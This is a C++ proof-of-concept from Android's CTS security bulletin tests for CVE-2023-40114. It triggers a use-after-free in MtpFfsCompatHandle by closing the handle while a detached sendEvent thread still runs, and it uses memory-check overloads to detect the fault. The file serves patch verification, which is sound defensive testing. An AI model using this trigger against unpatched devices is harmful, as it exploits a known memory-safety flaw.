xref: /aosp_15_r20/cts/hostsidetests/securitybulletin/securityPatch/CVE-2023-40114/poc.cpp (revision b7c941bb3fa97aba169d73cee0bed2de8ac964bf) 
1 /*
2  * Copyright (C) 2023 The Android Open Source Project
3  *
4  * Licensed under the Apache License, Version 2.0 (the "License");
5  * you may not use this file except in compliance with the License.
6  * You may obtain a copy of the License at
7  *
8  *      http://www.apache.org/licenses/LICENSE-2.0
9  *
10  * Unless required by applicable law or agreed to in writing, software
11  * distributed under the License is distributed on an "AS IS" BASIS,
12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13  * See the License for the specific language governing permissions and
14  * limitations under the License.
15  */
16 
17 #include <MtpFfsCompatHandle.h>
18 #include "../includes/common.h"
19 #include "../includes/memutils.h"
20 
21 using namespace android;
22 char enable_selective_overload = ENABLE_NONE;
23 
main(int argc,char * argv[])24 int main(int argc, char* argv[]) {
25     FAIL_CHECK(argc == 2);
26     int32_t controlFd;
27     const char* descriptorFilePath = argv[1];
28     controlFd = open(descriptorFilePath, O_RDWR | O_NONBLOCK | O_CLOEXEC);
29     FAIL_CHECK(controlFd >= 0);
30     struct mtp_event event;
31     event.data = const_cast<char*>("");
32     event.length = 0;
33     {
34         // Memory for handle is being allocated here
35         enable_selective_overload = ENABLE_ALL;
36         std::unique_ptr<IMtpHandle> handle(new MtpFfsCompatHandle(controlFd));
37         enable_selective_overload = ENABLE_FREE_CHECK | ENABLE_REALLOC_CHECK;
38 
39         // handle->sendEvent() internally calls handle->doSendEvent() in a detached thread.
40         // This will cause an use-after-free if handle goes out of scope before the thread completes
41         // its execution. The fix adds a wait in handle->close() to wait till the detached thread is
42         // fully executed.
43         handle->sendEvent(event);
44         handle->close();
45     }
46     // Sleep is added here to make sure program does not exit before use after free occurs in
47     // detached thread.
48     // It is observed that 200 ms is required for UAF to get triggered. But to detect the
49     // vulnerability in other slow devices, sleep of 1 second (1000 ms) is used here
50     sleep(1);
51     return EXIT_SUCCESS;
52 }
53